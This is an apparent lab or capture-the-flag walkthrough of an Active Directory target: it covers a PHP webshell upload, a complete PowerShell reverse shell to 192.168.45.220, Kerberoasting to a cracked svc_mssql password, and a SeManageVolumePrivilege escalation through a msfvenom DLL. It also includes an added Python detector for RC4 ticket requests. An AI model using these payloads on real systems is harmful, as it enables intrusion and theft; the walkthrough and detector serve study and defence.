Access 🔸

Enumeration

The web server shows a page about the event.

Initial Access

The site accepts image uploads, so we can upload a webshell: intercept the upload request and change the file extension from .png to .php...

The uploaded file will be in /uploads (discovered with feroxbuster).

Now let's try to get a reverse shell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.220',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Privilege Escalation

Transfer SharpHound to the target and get the zip it produces. Review the data in BloodHound.

The user svc_mssql is kerberoastable.

We don't have the svc_apache password, so we have to run the attack on the target itself. Transfer Rubeus there.

Cracking the hash with hashcat, we get svc_mssql:trustno1
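
From the defender's side, the ticket request behind this step is logged on the domain controller as Security event 4769. The following is an added example (not part of the original writeup) that filters such events for RC4-encrypted service tickets issued for user-account services; the events, the EXAMPLE.LOCAL realm, the host names and the IP addresses are constructed.

```python
from collections import defaultdict

RC4_HMAC = "0x17"  # legacy etype; crackable offline, typically asked for when roasting

# Constructed 4769 records (field names as in the Windows event); not from the target.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "svc_apache@EXAMPLE.LOCAL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.25"},
    {"EventID": 4769, "TargetUserName": "alice@EXAMPLE.LOCAL", "ServiceName": "FILESRV01$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.0.31"},
    {"EventID": 4769, "TargetUserName": "alice@EXAMPLE.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.0.0.31"},
    {"EventID": 4769, "TargetUserName": "WEB01$@EXAMPLE.LOCAL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.0.0.40"},
    {"EventID": 4769, "TargetUserName": "bob@EXAMPLE.LOCAL", "ServiceName": "svc_mssql",
     "TicketEncryptionType": "0x17", "Status": "0x1b", "IpAddress": "::ffff:10.0.0.52"},
    {"EventID": 4624, "TargetUserName": "alice", "IpAddress": "10.0.0.31"},
]


def is_roast_candidate(event):
    """True for a successful RC4 service ticket issued for a user-account service."""
    if event.get("EventID") != 4769 or event.get("Status") != "0x0":
        return False
    service = event.get("ServiceName", "")
    # Machine accounts ($) and krbtgt have long random keys, so they are not roasting targets.
    if not service or service.endswith("$") or service.lower() == "krbtgt":
        return False
    return event.get("TicketEncryptionType", "").lower() == RC4_HMAC


def find_kerberoast_candidates(events):
    """Group flagged requests as {requester: sorted list of requested services}."""
    hits = defaultdict(set)
    for event in events:
        if is_roast_candidate(event):
            hits[event["TargetUserName"]].add(event["ServiceName"])
    return {user: sorted(services) for user, services in hits.items()}


if __name__ == "__main__":
    for user, services in find_kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"{user} requested RC4 tickets for: {', '.join(services)}")
```

The encryption-type check is a heuristic: a ticket issued with AES (0x11 or 0x12) for a service account with a weak password can still be cracked offline, so the durable fix is a long random password or a managed service account for svc_mssql.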

To execute commands as this user, we need runas.

Using -Remote, we can redirect the shell to a remote one.

This user has SeManageVolumePrivilege.

Using https://github.com/CsEnox/SeManageVolumeExploit

Download and transfer the exe.

Now, following the readme, generate a malicious DLL with msfvenom and transfer it to C:\windows\system32\spool\drivers\x64\3\PrintConfig.dll.

Start a listener and trigger it.

Post Exploitation